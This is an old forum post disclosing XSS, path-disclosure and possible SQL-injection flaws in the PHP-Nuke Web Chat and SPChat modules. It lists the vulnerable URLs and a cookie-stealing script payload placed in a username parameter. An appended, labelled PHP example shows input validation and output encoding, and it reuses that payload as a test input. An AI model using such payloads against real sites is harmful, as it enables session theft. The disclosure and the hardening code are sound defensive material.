06-03-2003, 08:32 PM   #1
Join Date: May 2003
Posts: 56
Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0 Vulnerabilities

Vulnerability Type : XSS (Cross Site Scripting).. Path Disclosure.. disclosure of DB user name.. possible SQL injection ...

SFChat & WebChat are very good and stable systems of chat online.. but they indeed have their faults ...

Our findings prior to notifying the source writer along with our associates around the web ...

Warning : Access denied for user: you@localhost (Using password: YES) in /home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php

DataBase error will read : Link_ID == false, connect failed ...

MySQL error : 0 () Session halted ...

Path disclosure :

http://www.you.com/modules/WebChat/in.php
http://www.you.com/modules/WebChat/quit.php
http://www.you.com/modules/WebChat/users.php
http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.you.com/modules/WebChat/u...d=-1&username=">alert(document.cookie);

Solution :

To Fix the script temporarily.. you must erase this script off your Web.. or change its name so that nobody has access to it ... You have to search the site of the writer / programmer in search of the new patch.. to be able to continue using this chat ...

This information was released only yesterday 06 - 02 - 03 and there is no immediate patch available ...

CourtneyDS
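
Added example (not part of the original post, and not WebChat or SPChat code): one way a PHP page taking the `rid`, `uid` and `username` parameters named above can reject non-numeric IDs, HTML-encode the user name before output, and keep PHP warnings out of the response. The function names and the 32-character name limit are assumptions made for illustration.

```php
<?php
// Added example: hardened handling of the three parameters named in the post.
// Function names are hypothetical; this is not WebChat or SPChat code.

// Keep PHP warnings (file paths, DB user names) out of the HTTP response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Return a non-negative integer, or null for input such as "Non_Numeric" or "-1".
function chat_int_param(array $query, string $name): ?int
{
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null;
    }
    $value = filter_var($query[$name], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    return $value === false ? null : $value;
}

// Encode a user-supplied string for an HTML text node or quoted attribute.
function chat_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate a request; return the HTTP status and the body to send.
function chat_users_page(array $query): array
{
    $rid = chat_int_param($query, 'rid');
    $uid = chat_int_param($query, 'uid');
    $name = $query['username'] ?? '';
    // The 32-byte limit on the name is an assumed policy, not from the post.
    if ($rid === null || $uid === null || !is_string($name) || strlen($name) > 32) {
        // Generic error: no path, no SQL text, no echo of the input.
        return [400, 'Bad request'];
    }
    return [200, '<span class="user">' . chat_html($name) . '</span>'];
}

// Constructed sample requests modelled on the URLs in the post.
$samples = [
    ['rid' => 'Non_Numeric', 'uid' => '-1', 'username' => 'Any_Word'],
    ['rid' => '3', 'uid' => '7', 'username' => '">alert(document.cookie);'],
];
foreach ($samples as $q) {
    [$status, $body] = chat_users_page($q);
    echo $status, ' ', $body, PHP_EOL;
}
```

Because the IDs are reduced to validated integers before any use, the same check also removes them as a vector for the possible SQL injection the post mentions; string values that reach a query still need parameterized statements.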
All times are GMT -5.